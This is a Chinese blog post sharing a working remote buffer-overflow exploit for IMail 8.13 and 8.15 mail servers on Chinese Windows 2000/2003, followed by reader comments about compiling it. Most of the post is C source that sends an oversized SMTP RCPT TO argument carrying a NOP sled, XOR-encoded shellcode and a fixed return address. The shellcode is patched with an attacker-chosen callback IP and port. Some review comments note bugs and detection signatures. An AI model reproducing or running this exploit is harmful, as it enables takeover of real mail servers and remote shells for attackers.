Imail 8.13-8.15 的EXP (win2000 and win2k3 chinese version)

鬼仔:前段时间发过 IMail 2006 and 8.x的Exp ,但是那个是针对英文版的,当时就有朋友说“有中文版的就好了”,这次,就发一个中文版的:Test imail8.13,8.15 on win2000 and win2k3 chinese version.

来源:心路

写这个的时候,懒了一下,没有动态生成shellcode,而是直接使用了一个固定的key来编码,所以某些监听IP和端口编码后会包含特殊字符而出问题,不过程序做了判断,遇到这种情况直接不运行。—_—!
代码:

/*******************************************************************************
* Test imail8.13,8.15 on win2000 and win2k3 chinese version.
* code by 云舒,ph4nt0m.org,2006,11
* dou you know who is icy? ^_^
*******************************************************************************/

#include <stdio.h>
#include <winsock2.h>

#pragma comment( lib, "ws2_32" )

#define HELO "EHLO\r\n"
#define FROM "MAIL FROM <[email protected]>\r\n"

/*
 * Encoded payload buffer. It is patched in place by main() before being sent.
 *
 * Layout, as the labels below and the offsets used in main() show:
 *   - a short decoder stub (the bytes labelled "decode") that XORs the body
 *     with the 4-byte key that follows it;
 *   - the key itself, \xbd\xd7\x50\x90 (0x9050d7bd as a little-endian dword);
 *     main() XORs the callback address and port with the same key before
 *     writing them into the body at offsets 0xb8 and 0xbe;
 *   - the XOR-encoded body.
 *
 * The array is appended with strcat() in main(), so every byte must be
 * non-zero; the same is why main() refuses callback values whose encoded
 * form contains a byte the request cannot carry, instead of re-encoding.
 * Because the key is fixed, everything except the six patched bytes is
 * identical in every run -- from a defender's side that makes the encoded
 * body a static on-the-wire signature.
 * NOTE(review): what the decoded body does is not visible here; the usage
 * text only says to watch the listening port -- treat it as opaque.
 */
unsigned char shellcode[] =
/* decode */
"\x31\xc9\x83\xe9\xb8\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13"
/* decode key */
"\xbd\xd7\x50\x90"
"\x83\xeb\xfc\xe2\xf4"

/* shellcode */
"\x41\xbd\xbb\xdd\x55\x2e\xaf\x6f"
"\x42\xb7\xdb\xfc\x99\xf3\xdb\xd5\x81\x5c\x2c\x95\xc5\xd6\xbf\x1b"
"\xf2\xcf\xdb\xcf\x9d\xd6\xbb\xd9\x36\xe3\xdb\x91\x53\xe6\x90\x09"
"\x11\x53\x90\xe4\xba\x16\x9a\x9d\xbc\x15\xbb\x64\x86\x83\x74\xb8"
"\xc8\x32\xdb\xcf\x99\xd6\xbb\xf6\x36\xdb\x1b\x1b\xe2\xcb\x51\x7b"
"\xbe\xfb\xdb\x19\xd1\xf3\x4c\xf1\x7e\xe6\x8b\xf4\x36\x94\x60\x1b"
"\xfd\xdb\xdb\xe0\xa1\x7a\xdb\xd0\xb5\x89\x38\x1e\xf3\xd9\xbc\xc0"
"\x42\x01\x36\xc3\xdb\xbf\x63\xa2\xd5\xa0\x23\xa2\xe2\x83\xaf\x40"
"\xd5\x1c\xbd\x6c\x86\x87\xaf\x46\xe2\x5e\xb5\xf6\x3c\x3a\x58\x92"
"\xe8\xbd\x52\x6f\x6d\xbf\x89\x99\x48\x7a\x07\x6f\x6b\x84\x03\xc3"
"\xee\x94\x03\xd3\xee\x28\x80\xf8\x7d\x17\x90\x50\xdb\xbf\x77\x9f"
"\xdb\x84\xd9\x71\x28\xbf\xbc\x69\x17\xb7\x07\x6f\x6b\xbd\x40\xc1"
"\xe8\x28\x80\xf6\xd7\xb3\x36\xf8\xde\xba\x3a\xc0\xe4\xfe\x9c\x19"
"\x5a\xbd\x14\x19\x5f\xe6\x90\x63\x17\x42\xd9\x6d\x43\x95\x7d\x6e"
"\xff\xfb\xdd\xea\x85\x7c\xfb\x3b\xd5\xa5\xae\x23\xab\x28\x25\xb8"
"\x42\x01\x0b\xc7\xef\x86\x01\xc1\xd7\xd6\x01\xc1\xe8\x86\xaf\x40"
"\xd5\x7a\x89\x95\x73\x84\xaf\x46\xd7\x28\xaf\xa7\x42\x07\x38\x77"
"\xc4\x11\x29\x6f\xc8\xd3\xaf\x46\x42\xa0\xac\x6f\x6d\xbf\xa0\x1a"
"\xb9\x88\x03\x6f\x6b\x28\x80\x90";

/*
 * Print the tool banner and the command-line synopsis to stdout.
 * name: argv[0], echoed in the synopsis line.
 */
void Usage( char *name )
{
    static const char *const banner[] = {
        "\nCode by 云舒(ph4nt0m.org),thx luoluo(ph4nt0m.org)!\n",
        "Test imail8.13,8.15 on win2000 and win2k3 chinese version.\n",
        "Dou you know who is icy? ^_^\n",
    };

    /* None of the banner lines carries a conversion, so they are written verbatim. */
    for( size_t i = 0; i < sizeof banner / sizeof banner[0]; i++ )
    {
        fputs( banner[i], stdout );
    }

    fprintf( stdout, "\nUsage: %s <target_ip> <target_port> <cb_ip> <cb_port>\n", name );
}

/*
 * Entry point. argv: <target_ip> <target_port> <cb_ip> <cb_port>.
 *
 * Flow: patch the XOR-encoded callback address/port into shellcode[], refuse
 * values whose encoded bytes the request cannot carry, then speak plain SMTP
 * (banner, EHLO, MAIL FROM) and send a single oversized RCPT TO argument made
 * of 0x90 padding, the payload and a fixed 4-byte address.
 * Returns 0 after the final send() succeeds, -1 on any earlier failure; every
 * failure path after WSAStartup() releases the socket and the Winsock library.
 *
 * NOTE(review): none of the arguments is validated -- inet_addr() yields
 * INADDR_NONE for a malformed address and atoi() yields 0 for a malformed
 * port, and both are used as-is.
 */
int main( int argc, char *argv[] )
{
if( argc != 5 )
{
Usage( argv[0] );
return -1;
}

/* Callback address as the 32-bit network-order value inet_addr() returns. */
unsigned int cb_ip = inet_addr(argv[3]);

/* encode input ip by encode key */
/* Pre-XOR with the decoder key (the "decode key" bytes in shellcode[]) so the
 * in-place decoder turns it back into the plain value. */
cb_ip ^= 0x9050d7bd;

/* offset of ip is 0xb8 */
memcpy( (void *)(shellcode+0xb8), &cb_ip, 4 );

/* Callback port in network order; the atoi() result is not range-checked. */
unsigned short cb_port = htons( atoi(argv[4]) );

/* encode input port by encode key */
/* Only the upper half of the key; presumably the port sits on the upper two
 * bytes of a decoder dword at offset 0xbe -- verify against the stub. */
cb_port ^= 0x9050;

/* offset of port is 0xbe */
memcpy( (void *)(shellcode + 0xbe), &cb_port, 2 );

/* Reject encoded IP/port bytes that would corrupt the request: 0x00 would end
 * the strcat()'d C string and 0x0D/0x0A the SMTP line; space, '>' and '"'
 * presumably break the <...> address token. With a fixed key this is the only
 * fallback: the tool refuses rather than re-encodes. */
unsigned char error_char[6] = { 0x00,0x0D,0x0A,0x20,0x3e,0x22 };
unsigned char sz_ip[4] = { 0 };
unsigned char sz_port[2] = { 0 };

memcpy(sz_ip, (void *)&cb_ip, 4);
memcpy(sz_port, (void *)&cb_port, 2);

for( int index = 0; index < 6; index ++ )
{
/* NOTE(review): int j against size_t sizeof() is a signed/unsigned comparison;
 * harmless for these sizes, but -Wsign-compare flags it (also below). */
for (int j = 0; j < sizeof(sz_ip); j ++)
{
if (sz_ip[j] == error_char[index])
{
printf( "rpwt,haha,please change to another ip adress!\n" );
return -1;
}
}
for (int j = 0; j < sizeof(sz_port); j ++)
{
if (sz_port[j] == error_char[index])
{
printf( "rpwt,haha,please change to another port\n");
return -1;
}
}
}

WSAData wsa;
SOCKET sock;
struct sockaddr_in sin;
int ret;

/* Winsock 2.2. NOTE(review): WSAStartup() reports failure through its return
 * value (ret), not through GetLastError(), so the printed number may be stale.
 * GetLastError() returns a DWORD; "%d" is a format mismatch ("%lu"), here and
 * in every error message below. */
ret = WSAStartup( 0x0202, &wsa );
if( ret != 0 )
{
printf( "WSAStartup error: %d\n", GetLastError() );
return -1;
}

/* NOTE(review): WSAGetLastError() is the documented way to read Winsock errors;
 * GetLastError() is used here and below instead. */
sock = socket( AF_INET, SOCK_STREAM, 0 );
if( sock == INVALID_SOCKET )
{
printf( "Create socket error: %d\n", GetLastError() );

WSACleanup( );
return -1;
}

/* Target endpoint from argv[1]/argv[2]; neither value is validated. */
memset( &sin, 0, sizeof(struct sockaddr_in) );
sin.sin_addr.S_un.S_addr = inet_addr( argv[1] );
sin.sin_family = AF_INET;
sin.sin_port = htons( atoi(argv[2]) );

ret = connect( sock, (struct sockaddr *)&sin, sizeof(struct sockaddr_in) );
if( ret == SOCKET_ERROR )
{
printf( "Connect error: %d\n", GetLastError() );

closesocket( sock );
WSACleanup( );
return -1;
}
printf( "Connect ok!\n" );

char recv_buf[512] = { 0 };

/* get banner */
/* NOTE(review): recv() returning 0 (peer closed) is not treated as an error,
 * and a full 512-byte read leaves recv_buf without a terminator for the "%s"
 * below; recv( sock, recv_buf, sizeof recv_buf - 1, 0 ) would keep it
 * terminated. The same applies to the two recv() calls further down. */
ret = recv( sock, recv_buf, 512, 0 );
if( ret == SOCKET_ERROR )
{
printf( "Recv error: %d\n", GetLastError() );

closesocket( sock );
WSACleanup( );
return -1;
}
printf( "%s\n", recv_buf );

/* send hello */
/* EHLO without a hostname argument. NOTE(review): a short send (ret less than
 * the length) is not retried, here or in the later send() calls. */
ret = send( sock, HELO, strlen(HELO), 0 );
if( ret == SOCKET_ERROR )
{
printf( "Send error: %d\n", GetLastError() );

closesocket( sock );
WSACleanup( );
return -1;
}

/* recv */
memset( recv_buf, 0, 512 );
ret = recv( sock, recv_buf, 512, 0 );
if( ret == SOCKET_ERROR )
{
printf( "Recv error: %d\n", GetLastError() );

closesocket( sock );
WSACleanup( );
return -1;
}
printf( "%s\n", recv_buf );

/* send from */
ret = send( sock, FROM, strlen(FROM), 0 );
if( ret == SOCKET_ERROR )
{
printf( "Send error: %d\n", GetLastError() );

closesocket( sock );
WSACleanup( );
return -1;
}

/* recv */
memset( recv_buf, 0, 512 );
ret = recv( sock, recv_buf, 512, 0 );
if( ret == SOCKET_ERROR )
{
printf( "Recv error: %d\n", GetLastError() );

closesocket( sock );
WSACleanup( );
return -1;
}
printf( "%s\n", recv_buf );

char send_buf[1024] = { 0 };
/* Fixed 4-byte address appended after the payload; per the file header it is
 * tied to the Chinese Windows 2000/2003 builds named there. */
char *ret_addr = "\xe1\x1e\xfa\x7f";

/* | 548 | */
/* RCPT TO <@:|x90.....shellcode|ret| */
/* Pad with 0x90 so that padding plus payload is exactly 548 bytes.
 * NOTE(review): 548 - strlen() is size_t; if the payload were ever longer than
 * 548 bytes the subtraction wraps, the loop never terminates and send_buf
 * (1024 bytes) overflows. strlen() is also recomputed on every iteration --
 * compute it once before the loop and guard len <= 548. Appending shellcode
 * with strcat() relies on the array containing no '\0' byte.
 * On the wire this is one RCPT TO argument of roughly 570 bytes that starts
 * with "<@:" and is mostly 0x90 -- far beyond any legitimate address length,
 * which is the feature a mail gateway or IDS rule would key on. */
strcat( send_buf, "RCPT TO <@:" );
for( int index = 1; index <= 548 - strlen((char *)shellcode); index ++ )
{
strcat( send_buf, "\x90" );
}
strcat( send_buf, (char *)shellcode );
strcat( send_buf, ret_addr );
strcat( send_buf, ">\r\n\r\n" );

/* send shellcode */
ret = send( sock, send_buf, strlen(send_buf), 0 );
if( ret == SOCKET_ERROR )
{
printf( "Send error: %d\n", GetLastError() );

closesocket( sock );
WSACleanup( );
return -1;
}
/* ret is the byte count send() accepted, which may be less than strlen(send_buf). */
printf( "Send exploit %d bytes,check your listing port,good luck!\n", ret );

closesocket( sock );
WSACleanup( );
return 0;
}



  • 鬼仔

    自己编译下吧
    不会才更要学习啊

  • 关注中

    老兄,帮编译一下啊,俺不会编译,谢谢啊。 :lol:

  • 关注中

    $ gcc -o imail8.15.exe imail.c
    imail.c: In function `main':
    imail.c:61: parse error before `unsigned'
    imail.c:64: `cb_ip' undeclared (first use in this function)
    imail.c:64: (Each undeclared identifier is reported only once
    imail.c:209: parse error before string constant
    imail.c:209: conflicting types for `strcat'
    还有一大堆,
    怎么会这样啊?

  • pesoft

    VC F7
    GCC gcc -O2 -o iMailExp.exe iMailExp.c
